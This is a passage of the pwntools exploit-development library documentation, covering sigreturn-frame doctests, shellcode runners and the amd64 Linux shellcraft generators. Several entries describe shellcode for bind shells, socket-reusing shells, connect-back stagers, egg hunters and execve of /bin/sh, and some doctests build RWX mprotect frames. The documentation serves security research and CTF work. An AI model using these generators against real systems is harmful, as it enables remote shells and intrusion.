>>> assembly += 'int3:' + shellcraft.trap()
>>> assembly += 'syscall: ' + shellcraft.syscall()
>>> assembly += 'exit: ' + 'xor rdi, rdi; mov rax, 60; syscall;'
>>> assembly += 'message: ' + ('.asciz "%s"' % message)
>>> binary = ELF.from_assembly(assembly)
>>> frame = SigreturnFrame()
>>> frame.rax = constants.SYS_write
>>> frame.rdi = constants.STDOUT_FILENO
>>> frame.rsi = binary.symbols['message']
>>> frame.rdx = len(message)
>>> frame.rsp = 0xdeadbeef
>>> frame.rip = binary.symbols['syscall']
>>> p = process(binary.path)
>>> p.send(str(frame))
>>> p.recvn(len(message)) == message
True
>>> p.wait_for_close()
>>> p.poll() == 0
True
arm Example:
>>> context.clear()
>>> context.arch = "arm"
>>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'sp', 1024)
>>> assembly += 'sigreturn:' + shellcraft.sigreturn()
>>> assembly += 'int3:' + shellcraft.trap()
>>> assembly += 'syscall: ' + shellcraft.syscall()
>>> assembly += 'exit: ' + 'eor r0, r0; mov r7, 0x1; swi #0;'
>>> assembly += 'message: ' + ('.asciz "%s"' % message)
>>> binary = ELF.from_assembly(assembly)
>>> frame = SigreturnFrame()
>>> frame.r7 = constants.SYS_write
>>> frame.r0 = constants.STDOUT_FILENO
>>> frame.r1 = binary.symbols['message']
>>> frame.r2 = len(message)
>>> frame.sp = 0xdead0000
>>> frame.pc = binary.symbols['syscall']
>>> p = process(binary.path)
>>> p.send(str(frame))
>>> p.recvn(len(message)) == message
True
>>> p.wait_for_close()
>>> p.poll() == 0
True
Mips Example:
>>> context.clear()
>>> context.arch = "mips"
>>> context.endian = "big"
>>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, '$sp', 1024)
>>> assembly += 'sigreturn:' + shellcraft.sigreturn()
>>> assembly += 'syscall: ' + shellcraft.syscall()
>>> assembly += 'exit: ' + shellcraft.exit(0)
>>> assembly += 'message: ' + ('.asciz "%s"' % message)
>>> binary = ELF.from_assembly(assembly)
>>> frame = SigreturnFrame()
>>> frame.v0 = constants.SYS_write
>>> frame.a0 = constants.STDOUT_FILENO
>>> frame.a1 = binary.symbols['message']
>>> frame.a2 = len(message)
>>> frame.sp = 0xdead0000
>>> frame.pc = binary.symbols['syscall']
>>> p = process(binary.path)
>>> p.send(str(frame))
>>> p.recvn(len(message)) == message
True
>>> p.wait_for_close()
>>> p.poll() == 0
True
Mipsel Example:
>>> context.clear()
>>> context.arch = "mips"
>>> context.endian = "little"
>>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, '$sp', 1024)
>>> assembly += 'sigreturn:' + shellcraft.sigreturn()
>>> assembly += 'syscall: ' + shellcraft.syscall()
>>> assembly += 'exit: ' + shellcraft.exit(0)
>>> assembly += 'message: ' + ('.asciz "%s"' % message)
>>> binary = ELF.from_assembly(assembly)
>>> frame = SigreturnFrame()
>>> frame.v0 = constants.SYS_write
>>> frame.a0 = constants.STDOUT_FILENO
>>> frame.a1 = binary.symbols['message']
>>> frame.a2 = len(message)
>>> frame.sp = 0xdead0000
>>> frame.pc = binary.symbols['syscall']
>>> p = process(binary.path)
>>> p.send(str(frame))
>>> p.recvn(len(message)) == message
True
>>> p.wait_for_close()
>>> p.poll() == 0
True
-
class
pwnlib.rop.srop.
SigreturnFrame
(*a, **kw)[source]¶ Crafts a sigreturn frame with values that are loaded up into registers.
Parameters: arch (str) – The architecture. Currently i386
andamd64
are supported.Examples
Crafting a SigreturnFrame that calls mprotect on amd64
>>> context.clear(arch='amd64') >>> s = SigreturnFrame() >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 51, 0, 0, 0, 0, 0, 0, 0] >>> assert len(s) == 248 >>> s.rax = 0xa >>> s.rdi = 0x00601000 >>> s.rsi = 0x1000 >>> s.rdx = 0x7 >>> assert len(str(s)) == 248 >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6295552, 4096, 0, 0, 7, 10, 0, 0, 0, 0, 51, 0, 0, 0, 0, 0, 0, 0]
Crafting a SigreturnFrame that calls mprotect on i386
>>> context.clear(arch='i386') >>> s = SigreturnFrame(kernel='i386') >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 115, 0, 0, 123, 0] >>> assert len(s) == 80 >>> s.eax = 125 >>> s.ebx = 0x00601000 >>> s.ecx = 0x1000 >>> s.edx = 0x7 >>> assert len(str(s)) == 80 >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 6295552, 7, 4096, 125, 0, 0, 0, 115, 0, 0, 123, 0]
Crafting a SigreturnFrame that calls mprotect on ARM
>>> s = SigreturnFrame(arch='arm') >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1073741840, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1447448577, 288] >>> s.r0 = 125 >>> s.r1 = 0x00601000 >>> s.r2 = 0x1000 >>> s.r3 = 0x7 >>> assert len(str(s)) == 240 >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 6, 0, 0, 125, 6295552, 4096, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1073741840, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1447448577, 288]
Crafting a SigreturnFrame that calls mprotect on MIPS
>>> context.clear() >>> context.endian = "big" >>> s = SigreturnFrame(arch='mips') >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] >>> s.v0 = 0x101d >>> s.a0 = 0x00601000 >>> s.a1 = 0x1000 >>> s.a2 = 0x7 >>> assert len(str(s)) == 296 >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4125, 0, 0, 0, 6295552, 0, 4096, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
Crafting a SigreturnFrame that calls mprotect on MIPSel
>>> context.clear() >>> context.endian = "little" >>> s = SigreturnFrame(arch='mips') >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] >>> s.v0 = 0x101d >>> s.a0 = 0x00601000 >>> s.a1 = 0x1000 >>> s.a2 = 0x7 >>> assert len(str(s)) == 292 >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4125, 0, 0, 0, 6295552, 0, 4096, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
Crafting a SigreturnFrame that calls mprotect on Aarch64
>>> context.clear() >>> context.endian = "little" >>> s = SigreturnFrame(arch='aarch64') >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1179680769, 528] >>> s.x8 = 0xe2 >>> s.x0 = 0x4000 >>> s.x1 = 0x1000 >>> s.x2 = 0x7 >>> assert len(str(s)) == 600 >>> unpack_many(str(s)) [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 0, 4096, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 226, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1179680769, 528]
pwnlib.runner
— Running Shellcode¶
-
pwnlib.runner.
run_assembly
(*a, **kw)[source]¶ Given an assembly listing, assemble and execute it.
Returns: A process
tube to interact with the process.Example
>>> p = run_assembly('mov ebx, 3; mov eax, SYS_exit; int 0x80;') >>> p.wait_for_close() >>> p.poll() 3
>>> p = run_assembly('mov r0, #12; mov r7, #1; svc #0', arch='arm') >>> p.wait_for_close() >>> p.poll() 12
-
pwnlib.runner.
run_shellcode
(*a, **kw)[source]¶ Given assembled machine code bytes, execute them.
Example
>>> bytes = asm('mov ebx, 3; mov eax, SYS_exit; int 0x80;') >>> p = run_shellcode(bytes) >>> p.wait_for_close() >>> p.poll() 3
>>> bytes = asm('mov r0, #12; mov r7, #1; svc #0', arch='arm') >>> p = run_shellcode(bytes, arch='arm') >>> p.wait_for_close() >>> p.poll() 12
pwnlib.shellcraft
— Shellcode generation¶
The shellcode module.
This module contains functions for generating shellcode.
It is organized first by architecture and then by operating system.
Example
>>> print shellcraft.i386.nop().strip('\n')
nop
>>> print shellcraft.i386.linux.sh()
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
...
Submodules¶
pwnlib.shellcraft.amd64
— Shellcode for AMD64¶
pwnlib.shellcraft.amd64
¶
Shellcraft module containing generic Intel x86_64 shellcodes.
-
pwnlib.shellcraft.amd64.
crash
()[source]¶ Crash.
Example
>>> run_assembly(shellcraft.crash()).poll(True) -11
-
pwnlib.shellcraft.amd64.
itoa
(v, buffer='rsp', allocate_stack=True)[source]¶ Converts an integer into its string representation, and pushes it onto the stack.
Parameters: - v (str, int) – Integer constant or register that contains the value to convert.
- alloca –
Example
>>> sc = shellcraft.amd64.mov('rax', 0xdeadbeef) >>> sc += shellcraft.amd64.itoa('rax') >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 32) >>> run_assembly(sc).recvuntil('\x00') '3735928559\x00'
-
pwnlib.shellcraft.amd64.
memcpy
(dest, src, n)[source]¶ Copies memory.
Parameters: - dest – Destination address
- src – Source address
- n – Number of bytes
-
pwnlib.shellcraft.amd64.
mov
(dest, src, stack_allowed=True)[source]¶ Move src into dest without newlines and null bytes.
If the src is a register smaller than the dest, then it will be zero-extended to fit inside the larger register.
If the src is a register larger than the dest, then only some of the bits will be used.
If src is a string that is not a register, then it will locally set context.arch to ‘amd64’ and use
pwnlib.constants.eval()
to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of context.os.Example
>>> print shellcraft.amd64.mov('eax','ebx').rstrip() mov eax, ebx >>> print shellcraft.amd64.mov('eax', 0).rstrip() xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('ax', 0).rstrip() xor ax, ax /* 0 */ >>> print shellcraft.amd64.mov('rax', 0).rstrip() xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('rdi', 'ax').rstrip() movzx edi, ax >>> print shellcraft.amd64.mov('al', 'ax').rstrip() /* moving ax into al, but this is a no-op */ >>> print shellcraft.amd64.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.amd64.mov('eax', 1).rstrip() push 1 pop rax >>> print shellcraft.amd64.mov('rax', 0xc0).rstrip() xor eax, eax mov al, 0xc0 >>> print shellcraft.amd64.mov('rax', 0xc000).rstrip() xor eax, eax mov ah, 0xc000 >> 8 >>> print shellcraft.amd64.mov('rax', 0xc0c0).rstrip() xor eax, eax mov ax, 0xc0c0 >>> print shellcraft.amd64.mov('rdi', 0xff).rstrip() mov edi, 0x1010101 /* 255 == 0xff */ xor edi, 0x10101fe >>> print shellcraft.amd64.mov('rax', 0xdead00ff).rstrip() mov eax, 0x1010101 /* 3735879935 == 0xdead00ff */ xor eax, 0xdfac01fe >>> print shellcraft.amd64.mov('rax', 0x11dead00ff).rstrip() mov rax, 0x101010101010101 /* 76750323967 == 0x11dead00ff */ push rax mov rax, 0x1010110dfac01fe xor [rsp], rax pop rax
>>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() xor eax, eax /* (SYS_read) */ >>> with context.local(os = 'freebsd'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() push (SYS_read) /* 3 */ pop rax >>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop rax
Parameters:
-
pwnlib.shellcraft.amd64.
popad
()[source]¶ Pop all of the registers onto the stack which i386 popad does, in the same order.
-
pwnlib.shellcraft.amd64.
push
(value)[source]¶ Pushes a value onto the stack without using null bytes or newline characters.
If src is a string, then we try to evaluate with context.arch = ‘amd64’ using
pwnlib.constants.eval()
before determining how to push it. Note that this means that this shellcode can change behavior depending on the value of context.os.Parameters: value (int,str) – The value or register to push Example
>>> print pwnlib.shellcraft.amd64.push(0).rstrip() /* push 0 */ push 1 dec byte ptr [rsp] >>> print pwnlib.shellcraft.amd64.push(1).rstrip() /* push 1 */ push 1 >>> print pwnlib.shellcraft.amd64.push(256).rstrip() /* push 256 */ push 0x1010201 ^ 0x100 xor dword ptr [rsp], 0x1010201 >>> with context.local(os = 'linux'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ push 1 >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ push 4
-
pwnlib.shellcraft.amd64.
pushad
()[source]¶ Push all of the registers onto the stack which i386 pushad does, in the same order.
-
pwnlib.shellcraft.amd64.
pushstr
(string, append_null=True)[source]¶ Pushes a string onto the stack without using null bytes or newline characters.
Example
>>> print shellcraft.amd64.pushstr('').rstrip() /* push '\x00' */ push 1 dec byte ptr [rsp] >>> print shellcraft.amd64.pushstr('a').rstrip() /* push 'a\x00' */ push 0x61 >>> print shellcraft.amd64.pushstr('aa').rstrip() /* push 'aa\x00' */ push 0x1010101 ^ 0x6161 xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('aaa').rstrip() /* push 'aaa\x00' */ push 0x1010101 ^ 0x616161 xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('aaaa').rstrip() /* push 'aaaa\x00' */ push 0x61616161 >>> print shellcraft.amd64.pushstr('aaa\xc3').rstrip() /* push 'aaa\xc3\x00' */ mov rax, 0x101010101010101 push rax mov rax, 0x101010101010101 ^ 0xc3616161 xor [rsp], rax >>> print shellcraft.amd64.pushstr('aaa\xc3', append_null = False).rstrip() /* push 'aaa\xc3' */ push -0x3c9e9e9f >>> print shellcraft.amd64.pushstr('\xc3').rstrip() /* push '\xc3\x00' */ push 0x1010101 ^ 0xc3 xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('\xc3', append_null = False).rstrip() /* push '\xc3' */ push -0x3d >>> with context.local(): ... context.arch = 'amd64' ... print enhex(asm(shellcraft.pushstr("/bin/sh"))) 48b801010101010101015048b82e63686f2e72690148310424 >>> with context.local(): ... context.arch = 'amd64' ... print enhex(asm(shellcraft.pushstr(""))) 6a01fe0c24 >>> with context.local(): ... context.arch = 'amd64' ... print enhex(asm(shellcraft.pushstr("\x00", False))) 6a01fe0c24
Parameters:
-
pwnlib.shellcraft.amd64.
pushstr_array
(reg, array)[source]¶ Pushes an array/envp-style array of pointers onto the stack.
Parameters: - reg (str) – Destination register to hold the pointer.
- array (str,list) – Single argument or list of arguments to push. NULL termination is normalized so that each argument ends with exactly one NULL byte.
-
pwnlib.shellcraft.amd64.
ret
(return_value=None)[source]¶ A single-byte RET instruction.
Parameters: return_value – Value to return
-
pwnlib.shellcraft.amd64.
setregs
(reg_context, stack_allowed=True)[source]¶ Sets multiple registers, taking any register dependencies into account (i.e., given eax=1,ebx=eax, set ebx first).
Parameters: Example
>>> print shellcraft.setregs({'rax':1, 'rbx':'rax'}).rstrip() mov rbx, rax push 1 pop rax >>> print shellcraft.setregs({'rax': 'SYS_write', 'rbx':'rax'}).rstrip() mov rbx, rax push (SYS_write) /* 1 */ pop rax >>> print shellcraft.setregs({'rax':'rbx', 'rbx':'rax', 'rcx':'rbx'}).rstrip() mov rcx, rbx xchg rax, rbx >>> print shellcraft.setregs({'rax':1, 'rdx':0}).rstrip() push 1 pop rax cdq /* rdx=0 */
-
pwnlib.shellcraft.amd64.
strcpy
(dst, src)[source]¶ Copies a string
Example
>>> sc = 'jmp get_str\n' >>> sc += 'pop_str: pop rax\n' >>> sc += shellcraft.amd64.strcpy('rsp', 'rax') >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 32) >>> sc += shellcraft.amd64.linux.exit(0) >>> sc += 'get_str: call pop_str\n' >>> sc += '.asciz "Hello, world\\n"' >>> run_assembly(sc).recvline() 'Hello, world\n'
-
pwnlib.shellcraft.amd64.
strlen
(string, reg='rcx')[source]¶ Calculate the length of the specified string.
Parameters: Example
>>> sc = 'jmp get_str\n' >>> sc += 'pop_str: pop rdi\n' >>> sc += shellcraft.amd64.strlen('rdi', 'rax') >>> sc += 'push rax;' >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 8) >>> sc += shellcraft.amd64.linux.exit(0) >>> sc += 'get_str: call pop_str\n' >>> sc += '.asciz "Hello, world\\n"' >>> run_assembly(sc).unpack() == len('Hello, world\n') True
-
pwnlib.shellcraft.amd64.
xor
(key, address, count)[source]¶ XORs data a constant value.
Parameters: - key (int,str) – XOR key either as a 8-byte integer, If a string, length must be a power of two, and not longer than 8 bytes. Alternately, may be a register.
- address (int) – Address of the data (e.g. 0xdead0000, ‘esp’)
- count (int) – Number of bytes to XOR, or a register containing the number of bytes to XOR.
Example
>>> sc = shellcraft.read(0, 'rsp', 32) >>> sc += shellcraft.xor(0xdeadbeef, 'rsp', 32) >>> sc += shellcraft.write(1, 'rsp', 32) >>> io = run_assembly(sc) >>> io.send(cyclic(32)) >>> result = io.recvn(32) >>> expected = xor(cyclic(32), p32(0xdeadbeef)) >>> result == expected True
pwnlib.shellcraft.amd64.linux
¶
Shellcraft module containing Intel x86_64 shellcodes for Linux.
-
pwnlib.shellcraft.amd64.linux.
accept
(fd, addr, addr_len)[source]¶ Invokes the syscall accept. See ‘man 2 accept’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- addr_len (socklen_t) – addr_len
-
pwnlib.shellcraft.amd64.linux.
access
(name, type)[source]¶ Invokes the syscall access. See ‘man 2 access’ for more information.
Parameters: - name (char) – name
- type (int) – type
-
pwnlib.shellcraft.amd64.linux.
acct
(name)[source]¶ Invokes the syscall acct. See ‘man 2 acct’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.amd64.linux.
alarm
(seconds)[source]¶ Invokes the syscall alarm. See ‘man 2 alarm’ for more information.
Parameters: seconds (unsigned) – seconds
-
pwnlib.shellcraft.amd64.linux.
bind
(fd, addr, length)[source]¶ Invokes the syscall bind. See ‘man 2 bind’ for more information.
Parameters: - fd (int) – fd
- addr (CONST_SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.amd64.linux.
bindsh
(port, network)[source]¶ Listens on a TCP port and spawns a shell for the first to connect. Port is the TCP port to listen on, network is either ‘ipv4’ or ‘ipv6’.
-
pwnlib.shellcraft.amd64.linux.
brk
(addr)[source]¶ Invokes the syscall brk. See ‘man 2 brk’ for more information.
Parameters: addr (void) – addr
-
pwnlib.shellcraft.amd64.linux.
cat
(filename, fd=1)[source]¶ Opens a file and writes its contents to the specified file descriptor.
-
pwnlib.shellcraft.amd64.linux.
chdir
(path)[source]¶ Invokes the syscall chdir. See ‘man 2 chdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.amd64.linux.
chmod
(file, mode)[source]¶ Invokes the syscall chmod. See ‘man 2 chmod’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.amd64.linux.
chown
(file, owner, group)[source]¶ Invokes the syscall chown. See ‘man 2 chown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.amd64.linux.
chroot
(path)[source]¶ Invokes the syscall chroot. See ‘man 2 chroot’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.amd64.linux.
clock_getres
(clock_id, res)[source]¶ Invokes the syscall clock_getres. See ‘man 2 clock_getres’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- res (timespec) – res
-
pwnlib.shellcraft.amd64.linux.
clock_gettime
(clock_id, tp)[source]¶ Invokes the syscall clock_gettime. See ‘man 2 clock_gettime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.amd64.linux.
clock_nanosleep
(clock_id, flags, req, rem)[source]¶ Invokes the syscall clock_nanosleep. See ‘man 2 clock_nanosleep’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- flags (int) – flags
- req (timespec) – req
- rem (timespec) – rem
-
pwnlib.shellcraft.amd64.linux.
clock_settime
(clock_id, tp)[source]¶ Invokes the syscall clock_settime. See ‘man 2 clock_settime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.amd64.linux.
clone
(fn, child_stack, flags, arg, vararg)[source]¶ Invokes the syscall clone. See ‘man 2 clone’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
close
(fd)[source]¶ Invokes the syscall close. See ‘man 2 close’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.amd64.linux.
connect
(host, port, network='ipv4')[source]¶ Connects to the host on the specified port. Network is either ‘ipv4’ or ‘ipv6’. Leaves the connected socket in rbp.
-
pwnlib.shellcraft.amd64.linux.
connectstager
(host, port, network='ipv4')[source]¶ connect recvsize stager :param host, where to connect to: :param port, which port to connect to: :param network, ipv4 or ipv6? (default: ipv4)
-
pwnlib.shellcraft.amd64.linux.
creat
(file, mode)[source]¶ Invokes the syscall creat. See ‘man 2 creat’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.amd64.linux.
dup
(sock='rbp')[source]¶ Args: [sock (imm/reg) = rbp] Duplicates sock to stdin, stdout and stderr
-
pwnlib.shellcraft.amd64.linux.
dup2
(fd, fd2)[source]¶ Invokes the syscall dup2. See ‘man 2 dup2’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
dup3
(fd, fd2, flags)[source]¶ Invokes the syscall dup3. See ‘man 2 dup3’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
dupsh
(sock='rbp')[source]¶ Args: [sock (imm/reg) = rbp] Duplicates sock to stdin, stdout and stderr and spawns a shell.
-
pwnlib.shellcraft.amd64.linux.
egghunter
(egg, start_address = 0)[source]¶ Searches memory for the byte sequence ‘egg’.
Return value is the address immediately following the match, stored in RDI.
Parameters: - egg (str, int) – String of bytes, or word-size integer to search for
- start_address (int) – Where to start the search
-
pwnlib.shellcraft.amd64.linux.
epoll_create
(size)[source]¶ Invokes the syscall epoll_create. See ‘man 2 epoll_create’ for more information.
Parameters: size (int) – size
-
pwnlib.shellcraft.amd64.linux.
epoll_create1
(flags)[source]¶ Invokes the syscall epoll_create1. See ‘man 2 epoll_create1’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.amd64.linux.
epoll_ctl
(epfd, op, fd, event)[source]¶ Invokes the syscall epoll_ctl. See ‘man 2 epoll_ctl’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
epoll_pwait
(epfd, events, maxevents, timeout, ss)[source]¶ Invokes the syscall epoll_pwait. See ‘man 2 epoll_pwait’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
epoll_wait
(epfd, events, maxevents, timeout)[source]¶ Invokes the syscall epoll_wait. See ‘man 2 epoll_wait’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
execve
(path='/bin///sh', argv=[], envp={})[source]¶ Execute a different process.
Attempts to perform some automatic detection of types. Otherwise, the arguments behave as normal.
- If
path
is a string that is not a known register, it is pushed onto the stack. - If
argv
is an array of strings, it is pushed onto the stack, and NULL-terminated. - If
envp
is an dictionary of {string:string}, it is pushed onto the stack, and NULL-terminated.
Example
>>> path = '/bin/sh' >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] >>> envp = {'NAME': 'zerocool', 'STATUS': 3} >>> sc = shellcraft.amd64.linux.execve(path, argv, envp) >>> io = run_assembly(sc) >>> io.recvall() 'Hello, zerocool\n' >>> io.poll(True) 3
- If
-
pwnlib.shellcraft.amd64.linux.
exit
(status=None)[source]¶ Invokes the syscall exit. See ‘man 2 exit’ for more information.
Parameters: status (int) – status Doctest
>>> run_assembly_exitcode(shellcraft.exit(33)) 33
-
pwnlib.shellcraft.amd64.linux.
faccessat
(fd, file, type, flag)[source]¶ Invokes the syscall faccessat. See ‘man 2 faccessat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fallocate
(fd, mode, offset, length)[source]¶ Invokes the syscall fallocate. See ‘man 2 fallocate’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fchdir
(fd)[source]¶ Invokes the syscall fchdir. See ‘man 2 fchdir’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.amd64.linux.
fchmod
(fd, mode)[source]¶ Invokes the syscall fchmod. See ‘man 2 fchmod’ for more information.
Parameters: - fd (int) – fd
- mode (mode_t) – mode
-
pwnlib.shellcraft.amd64.linux.
fchmodat
(fd, file, mode, flag)[source]¶ Invokes the syscall fchmodat. See ‘man 2 fchmodat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fchown
(fd, owner, group)[source]¶ Invokes the syscall fchown. See ‘man 2 fchown’ for more information.
Parameters: - fd (int) – fd
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.amd64.linux.
fchownat
(fd, file, owner, group, flag)[source]¶ Invokes the syscall fchownat. See ‘man 2 fchownat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fcntl
(fd, cmd, vararg)[source]¶ Invokes the syscall fcntl. See ‘man 2 fcntl’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fdatasync
(fildes)[source]¶ Invokes the syscall fdatasync. See ‘man 2 fdatasync’ for more information.
Parameters: fildes (int) – fildes
-
pwnlib.shellcraft.amd64.linux.
findpeer
(port=None)[source]¶ Args: port (defaults to any port) Finds a socket, which is connected to the specified port. Leaves socket in RDI.
-
pwnlib.shellcraft.amd64.linux.
findpeersh
(port=None)[source]¶ Args: port (defaults to any) Finds an open socket which connects to a specified port, and then opens a dup2 shell on it.
-
pwnlib.shellcraft.amd64.linux.
findpeerstager
(port=None)[source]¶ Findpeer recvsize stager :param port, the port given to findpeer: :type port, the port given to findpeer: defaults to any
-
pwnlib.shellcraft.amd64.linux.
flock
(fd, operation)[source]¶ Invokes the syscall flock. See ‘man 2 flock’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fork
()[source]¶ Invokes the syscall fork. See ‘man 2 fork’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
forkexit
()[source]¶ Attempts to fork. If the fork is successful, the parent exits.
-
pwnlib.shellcraft.amd64.linux.
fstat
(fd, buf)[source]¶ Invokes the syscall fstat. See ‘man 2 fstat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
